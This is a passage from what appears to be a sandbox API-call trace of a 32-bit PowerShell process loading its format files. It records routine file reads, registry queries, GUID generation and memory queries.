0x0 [0076.510] SetErrorMode (uMode=0x1) returned 0x1 [0076.510] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2dda9c8 | out: lpFileInformation=0x2dda9c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0076.510] GetLastError () returned 0x0 [0076.511] SetErrorMode (uMode=0x1) returned 0x1 [0076.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0076.511] GetLastError () returned 0x0 [0076.511] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae1d8 | out: phkResult=0xae1d8*=0x358) returned 0x0 [0076.511] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae220, lpData=0x0, lpcbData=0xae21c*=0x0 | out: lpType=0xae220*=0x1, lpData=0x0, lpcbData=0xae21c*=0x56) returned 0x0 [0076.511] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae220, lpData=0x54b630, lpcbData=0xae21c*=0x56 | out: lpType=0xae220*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xae21c*=0x56) returned 0x0 [0076.511] RegCloseKey (hKey=0x358) returned 0x0 [0076.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0076.511] GetLastError () returned 0x0 [0076.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadd14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0076.511] GetLastError () returned 0x0 [0076.512] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xc7a03135, Data2=0xcd87, Data3=0x4571, Data4=([0]=0xac, [1]=0x64, [2]=0xfa, [3]=0x3, [4]=0x2e, [5]=0x44, [6]=0xdd, [7]=0x31))) returned 0x0 [0076.512] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xd6fa0bce, Data2=0x7685, Data3=0x46f5, Data4=([0]=0xa5, [1]=0x3c, [2]=0xee, [3]=0x6d, [4]=0x5f, [5]=0x22, [6]=0x4d, [7]=0x4c))) returned 0x0 [0076.512] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xa4f3c5df, Data2=0x335a, Data3=0x4787, Data4=([0]=0xb6, [1]=0x1d, [2]=0x7c, [3]=0x2d, [4]=0xcd, [5]=0xf0, [6]=0x77, [7]=0xab))) returned 0x0 [0076.512] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x8eeb4318, Data2=0xd09b, Data3=0x491d, Data4=([0]=0xac, [1]=0x53, [2]=0xf3, [3]=0xeb, [4]=0xf1, [5]=0x3, [6]=0xb2, [7]=0xe7))) returned 0x0 [0076.513] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x13a0d91e, Data2=0xe93d, Data3=0x4493, Data4=([0]=0xb2, [1]=0xd3, [2]=0x16, [3]=0x94, [4]=0xf5, [5]=0x9f, [6]=0x3e, [7]=0x51))) returned 0x0 [0076.513] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x9c44931a, Data2=0xb459, Data3=0x4c01, Data4=([0]=0xb3, [1]=0x8, [2]=0x79, [3]=0xd3, [4]=0xae, [5]=0xe3, [6]=0x35, [7]=0x84))) returned 0x0 [0076.513] VirtualQuery (in: lpAddress=0xacf80, lpBuffer=0xadf80, dwLength=0x1c | out: lpBuffer=0xadf80*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.513] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x239b159b, Data2=0x2b2d, Data3=0x402a, Data4=([0]=0xa0, [1]=0x5e, [2]=0x1b, [3]=0x8d, [4]=0xf9, [5]=0xf5, [6]=0x8, [7]=0x4c))) returned 0x0 [0076.513] VirtualQuery (in: lpAddress=0xacf80, lpBuffer=0xadf80, dwLength=0x1c | out: lpBuffer=0xadf80*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.513] VirtualQuery (in: lpAddress=0xacf80, lpBuffer=0xadf80, dwLength=0x1c | out: lpBuffer=0xadf80*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.513] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x59c44304, Data2=0xf198, Data3=0x4e3f, Data4=([0]=0xaa, [1]=0xde, [2]=0x7b, [3]=0xcc, [4]=0xb3, [5]=0x22, [6]=0x2c, [7]=0x22))) returned 0x0 [0076.513] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xda07a61b, Data2=0xc0a2, Data3=0x435c, Data4=([0]=0xb4, [1]=0xf5, [2]=0x7b, [3]=0xf9, [4]=0xc1, [5]=0xe6, [6]=0x0, [7]=0x3f))) returned 0x0 [0076.513] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x490afc5d, Data2=0x52dd, Data3=0x408f, Data4=([0]=0x9f, [1]=0xb9, [2]=0xd6, [3]=0x98, [4]=0xcf, [5]=0xa, [6]=0x17, [7]=0xaa))) returned 0x0 [0076.513] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xc3d27b80, Data2=0x40b1, Data3=0x43ac, Data4=([0]=0xb2, [1]=0xc3, [2]=0x61, [3]=0x22, [4]=0xb, [5]=0x14, [6]=0x4c, [7]=0xf5))) returned 0x0 [0076.514] VirtualQuery (in: lpAddress=0xacf80, lpBuffer=0xadf80, dwLength=0x1c | out: lpBuffer=0xadf80*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.514] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x4bb6935f, Data2=0x6ed7, Data3=0x4fb6, Data4=([0]=0xb1, [1]=0xe, [2]=0x4b, [3]=0x7f, [4]=0x5c, [5]=0x1d, [6]=0xd, [7]=0xea))) returned 0x0 [0076.514] VirtualQuery (in: lpAddress=0xacf80, lpBuffer=0xadf80, dwLength=0x1c | out: lpBuffer=0xadf80*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.514] VirtualQuery (in: lpAddress=0xacf80, lpBuffer=0xadf80, dwLength=0x1c | out: lpBuffer=0xadf80*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.514] VirtualQuery (in: lpAddress=0xacf80, lpBuffer=0xadf80, dwLength=0x1c | out: lpBuffer=0xadf80*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.515] VirtualQuery (in: lpAddress=0xacf80, lpBuffer=0xadf80, dwLength=0x1c | out: lpBuffer=0xadf80*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.515] VirtualQuery (in: lpAddress=0xacf80, lpBuffer=0xadf80, dwLength=0x1c | out: lpBuffer=0xadf80*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.515] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x667951f3, Data2=0xd305, Data3=0x4749, Data4=([0]=0xa0, [1]=0xe6, [2]=0xb4, [3]=0xf, [4]=0xd, [5]=0x59, [6]=0xef, [7]=0x36))) returned 0x0 [0076.515] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x8bf0c8f2, Data2=0xd39, Data3=0x4d65, Data4=([0]=0x86, [1]=0x39, [2]=0xce, [3]=0xd9, [4]=0xa7, [5]=0x90, [6]=0xf, [7]=0x9a))) returned 0x0 [0076.516] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xb6f46c9b, Data2=0x5f8a, Data3=0x460f, Data4=([0]=0x94, [1]=0xad, [2]=0x4a, [3]=0xef, [4]=0x41, [5]=0x55, [6]=0x3e, [7]=0xf9))) returned 0x0 [0076.516] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x21fcbefa, Data2=0xee98, Data3=0x4fc9, Data4=([0]=0x87, [1]=0x7e, [2]=0x38, [3]=0x47, [4]=0xb6, [5]=0x52, [6]=0x79, [7]=0x6f))) returned 0x0 [0076.516] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xcdf6d54a, Data2=0xa5f0, Data3=0x4621, Data4=([0]=0xb4, [1]=0x76, [2]=0xda, [3]=0x14, [4]=0x32, [5]=0x62, [6]=0xa8, [7]=0xc6))) returned 0x0 [0076.516] VirtualQuery (in: lpAddress=0xad0d4, lpBuffer=0xae0d4, dwLength=0x1c | out: lpBuffer=0xae0d4*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.516] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x83af9328, Data2=0x5822, Data3=0x45e1, Data4=([0]=0xa3, [1]=0xb4, [2]=0x62, [3]=0xeb, [4]=0x91, [5]=0xc7, [6]=0x22, [7]=0x97))) returned 0x0 [0076.516] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xa9d8a646, Data2=0x8b3e, Data3=0x4b73, Data4=([0]=0xae, [1]=0x63, [2]=0x39, [3]=0x99, [4]=0xbc, [5]=0xbc, [6]=0x2b, [7]=0xd))) returned 0x0 [0076.516] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xc13d533, Data2=0xf270, Data3=0x4e86, Data4=([0]=0x8c, [1]=0xea, [2]=0x0, [3]=0x30, [4]=0x80, [5]=0xd3, [6]=0xb8, [7]=0xe3))) returned 0x0 [0076.516] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xbec12673, Data2=0x5789, Data3=0x4bc2, Data4=([0]=0x81, [1]=0xe3, [2]=0x78, [3]=0x45, [4]=0xc8, [5]=0x8c, [6]=0x3c, [7]=0x3f))) returned 0x0 [0076.516] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x7b4c3dac, Data2=0xf277, Data3=0x4ec6, Data4=([0]=0xaf, [1]=0x9c, [2]=0xd8, [3]=0xcf, [4]=0x7c, [5]=0x28, [6]=0xab, [7]=0xe3))) returned 0x0 [0076.516] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x63ff8af9, Data2=0x3c89, Data3=0x4004, Data4=([0]=0x84, [1]=0x82, [2]=0x4f, [3]=0x5e, [4]=0x83, [5]=0x43, [6]=0xa2, [7]=0x24))) returned 0x0 [0076.517] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x64578c2a, Data2=0xa164, Data3=0x4bc1, Data4=([0]=0x9c, [1]=0x49, [2]=0x20, [3]=0x6c, [4]=0xe0, [5]=0x3a, [6]=0x18, [7]=0x11))) returned 0x0 [0076.517] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xcebaa5a9, Data2=0x30a7, Data3=0x4103, Data4=([0]=0xbc, [1]=0xdd, [2]=0x0, [3]=0x80, [4]=0x36, [5]=0xc2, [6]=0x4, [7]=0x50))) returned 0x0 [0076.517] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xb154b305, Data2=0x6e15, Data3=0x497a, Data4=([0]=0xaa, [1]=0x26, [2]=0xd, [3]=0x89, [4]=0x84, [5]=0xe3, [6]=0xe3, [7]=0x21))) returned 0x0 [0076.517] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x88242b0, Data2=0x2278, Data3=0x43bc, Data4=([0]=0x94, [1]=0x52, [2]=0x3c, [3]=0x2, [4]=0x1f, [5]=0xb3, [6]=0x3a, [7]=0x96))) returned 0x0 [0076.517] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x5f62b3, Data2=0x90a0, Data3=0x4b98, Data4=([0]=0x96, [1]=0x70, [2]=0x4a, [3]=0xbc, [4]=0x7, [5]=0x82, [6]=0x28, [7]=0xb3))) returned 0x0 [0076.517] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xd740786b, Data2=0xd3e8, Data3=0x4ab7, Data4=([0]=0xb8, [1]=0x5c, [2]=0xdd, [3]=0x6c, [4]=0x71, [5]=0xf7, [6]=0x95, [7]=0x8))) returned 0x0 [0076.517] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xd1dfc763, Data2=0xdfb2, Data3=0x43d9, Data4=([0]=0xa7, [1]=0x19, [2]=0x3b, [3]=0xba, [4]=0x89, [5]=0xae, [6]=0x2c, [7]=0x8d))) returned 0x0 [0076.517] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x8148ab09, Data2=0x4155, Data3=0x472f, Data4=([0]=0xa7, [1]=0x89, [2]=0x63, [3]=0xd0, [4]=0x16, [5]=0xe2, [6]=0xdf, [7]=0xce))) returned 0x0 [0076.517] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x3642d70a, Data2=0xc9c5, Data3=0x4873, Data4=([0]=0xaa, [1]=0xb1, [2]=0x24, [3]=0x80, [4]=0x29, [5]=0x4e, [6]=0xd5, [7]=0x1e))) returned 0x0 [0076.517] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xc298a4e0, Data2=0xe32a, Data3=0x4143, Data4=([0]=0xa3, [1]=0x60, [2]=0xc2, [3]=0x62, [4]=0xd2, [5]=0xd, [6]=0xf8, [7]=0x7a))) returned 0x0 [0076.517] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xfc80c8e0, Data2=0x7f39, Data3=0x4b6c, Data4=([0]=0x98, [1]=0x8e, [2]=0x3, [3]=0xbb, [4]=0x3, [5]=0x46, [6]=0x7d, [7]=0xa8))) returned 0x0 [0076.518] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xf31b6eb0, Data2=0xbf62, Data3=0x4955, Data4=([0]=0x91, [1]=0xa8, [2]=0x6e, [3]=0xb2, [4]=0x6a, [5]=0x34, [6]=0x97, [7]=0xa2))) returned 0x0 [0076.518] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x57d77e82, Data2=0xf3db, Data3=0x4f86, Data4=([0]=0x94, [1]=0x64, [2]=0x60, [3]=0x4, [4]=0x8b, [5]=0x44, [6]=0x4b, [7]=0xfa))) returned 0x0 [0076.518] VirtualQuery (in: lpAddress=0xacf80, lpBuffer=0xadf80, dwLength=0x1c | out: lpBuffer=0xadf80*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.518] VirtualQuery (in: lpAddress=0xacf80, lpBuffer=0xadf80, dwLength=0x1c | out: lpBuffer=0xadf80*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.519] VirtualQuery (in: lpAddress=0xacf80, lpBuffer=0xadf80, dwLength=0x1c | out: lpBuffer=0xadf80*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.521] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x9b2c5070, Data2=0xc398, Data3=0x4f7c, Data4=([0]=0x9d, [1]=0x8b, [2]=0x4c, [3]=0x34, [4]=0x9, [5]=0xac, [6]=0x1f, [7]=0xd0))) returned 0x0 [0076.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadcec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0076.521] GetLastError () returned 0x0 [0076.521] SetErrorMode (uMode=0x1) returned 0x1 [0076.521] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x358 [0076.521] GetLastError () returned 0x0 [0076.521] GetFileType (hFile=0x358) returned 0x1 [0076.521] SetErrorMode (uMode=0x1) returned 0x1 [0076.521] GetFileType (hFile=0x358) returned 0x1 [0076.522] ReadFile (in: hFile=0x358, lpBuffer=0x2e778b4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e778b4*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.523] GetLastError () returned 0x0 [0076.523] ReadFile (in: hFile=0x358, lpBuffer=0x2e778b4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e778b4*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.524] GetLastError () returned 0x0 [0076.524] ReadFile (in: hFile=0x358, lpBuffer=0x2e778b4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e778b4*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.524] GetLastError () returned 0x0 [0076.524] ReadFile (in: hFile=0x358, lpBuffer=0x2e778b4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e778b4*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.524] GetLastError () returned 0x0 [0076.524] ReadFile (in: hFile=0x358, lpBuffer=0x2e778b4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e778b4*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.524] GetLastError () returned 0x0 [0076.524] ReadFile (in: hFile=0x358, lpBuffer=0x2e778b4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e778b4*, lpNumberOfBytesRead=0xae254*=0x1000, lpOverlapped=0x0) returned 1 [0076.525] GetLastError () returned 0x0 [0076.525] ReadFile (in: hFile=0x358, lpBuffer=0x2e778b4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e778b4*, lpNumberOfBytesRead=0xae254*=0x119, lpOverlapped=0x0) returned 1 [0076.525] GetLastError () returned 0x0 [0076.525] ReadFile (in: hFile=0x358, lpBuffer=0x2e778b4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae254, lpOverlapped=0x0 | out: lpBuffer=0x2e778b4*, lpNumberOfBytesRead=0xae254*=0x0, lpOverlapped=0x0) returned 1 [0076.525] GetLastError () returned 0x0 [0076.525] CloseHandle (hObject=0x358) returned 1 [0076.525] GetLastError () returned 0x0 [0076.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaddb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0076.525] GetLastError () returned 0x0 [0076.525] SetErrorMode (uMode=0x1) returned 0x1 [0076.525] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2e988b0 | out: lpFileInformation=0x2e988b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0076.525] GetLastError () returned 0x0 [0076.525] SetErrorMode (uMode=0x1) returned 0x1 [0076.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0076.525] GetLastError () returned 0x0 [0076.526] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae1d8 | out: phkResult=0xae1d8*=0x358) returned 0x0 [0076.526] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae220, lpData=0x0, lpcbData=0xae21c*=0x0 | out: lpType=0xae220*=0x1, lpData=0x0, lpcbData=0xae21c*=0x56) returned 0x0 [0076.526] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae220, lpData=0x54b630, lpcbData=0xae21c*=0x56 | out: lpType=0xae220*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xae21c*=0x56) returned 0x0 [0076.526] RegCloseKey (hKey=0x358) returned 0x0 [0076.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0076.526] GetLastError () returned 0x0 [0076.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadd14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0076.526] GetLastError () returned 0x0 [0076.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.527] GetLastError () returned 0x0 [0076.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.527] GetLastError () returned 0x0 [0076.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.527] GetLastError () returned 0x0 [0076.527] VirtualQuery (in: lpAddress=0xacf30, lpBuffer=0xadf30, dwLength=0x1c | out: lpBuffer=0xadf30*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.527] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x90f806bf, Data2=0x55d1, Data3=0x4b4b, Data4=([0]=0x8e, [1]=0x7, [2]=0x6, [3]=0x13, [4]=0xc8, [5]=0x65, [6]=0x3f, [7]=0xa4))) returned 0x0 [0076.527] VirtualQuery (in: lpAddress=0xacf80, lpBuffer=0xadf80, dwLength=0x1c | out: lpBuffer=0xadf80*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.527] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x78064e30, Data2=0x12a6, Data3=0x4330, Data4=([0]=0x93, [1]=0xcd, [2]=0x3a, [3]=0xdd, [4]=0x7d, [5]=0x10, [6]=0x28, [7]=0xf3))) returned 0x0 [0076.528] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xdb44c87a, Data2=0x698b, Data3=0x4c1f, Data4=([0]=0x97, [1]=0x7e, [2]=0x55, [3]=0x79, [4]=0x6a, [5]=0x9f, [6]=0x2b, [7]=0xf0))) returned 0x0 [0076.528] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0xaeac26c, Data2=0x8707, Data3=0x4c13, Data4=([0]=0x99, [1]=0x52, [2]=0x35, [3]=0x9d, [4]=0x59, [5]=0x85, [6]=0x40, [7]=0x59))) returned 0x0 [0076.528] VirtualQuery (in: lpAddress=0xacf80, lpBuffer=0xadf80, dwLength=0x1c | out: lpBuffer=0xadf80*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.528] VirtualQuery (in: lpAddress=0xacf80, lpBuffer=0xadf80, dwLength=0x1c | out: lpBuffer=0xadf80*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadcec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0076.528] GetLastError () returned 0x0 [0076.528] SetErrorMode (uMode=0x1) returned 0x1 [0076.528] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x358 [0076.528] GetLastError () returned 0x0 [0076.528] GetFileType 